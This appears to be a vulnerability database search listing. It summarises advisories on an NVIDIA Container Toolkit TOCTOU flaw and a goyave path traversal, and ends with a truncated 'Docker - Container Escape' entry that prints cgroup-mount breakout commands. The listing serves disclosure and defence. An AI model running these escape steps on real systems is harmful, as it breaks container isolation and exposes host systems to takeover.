7 matches found
EUVD-2016-10406
Malware in sbrugna...
NVIDIA Container Toolkit 1.16.1 Breakout
NVIDIA Container Toolkit versions 1.16.1 and below contain a Time-of-check Time-of-Use TOCTOU vulnerability when used with a default configuration where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful...
GO-2024-3293 Full access to the host's OS file system using osfs.FS with Router.Static in goyave.dev/goyave/v5
Static file serving using router.Static and osfs.FS allows clients to access any file on the host file system using relative paths because the requested path is not sanitized and . and .. segments are accepted. The files will be returned as a response, provided the system user running the Go...
GHSA-MJJW-553X-87PQ NVIDIA Container Toolkit contains a Time-of-check Time-of-Use (TOCTOU) vulnerability
NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use TOCTOU vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of...
NVIDIA Container Toolkit contains a Time-of-check Time-of-Use (TOCTOU) vulnerability
NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use TOCTOU vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of...
Duplicate Advisory: NVIDIA Container Toolkit contains a Time-of-check Time-of-Use (TOCTOU) vulnerability
Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-mjjw-553x-87pq. This link is maintained to preserve external references. Original Description NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use TOCTOU vulnerability when used with...
Docker - Container Escape
On the host docker run --rm -it --cap-add=SYSADMIN --security-opt apparmor=unconfined ubuntu bash In the container mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 /tmp/cgrp/x/notifyonrelease hostpath=sed -n 's/.\perdir=^,./\1/p' /etc/mtab echo...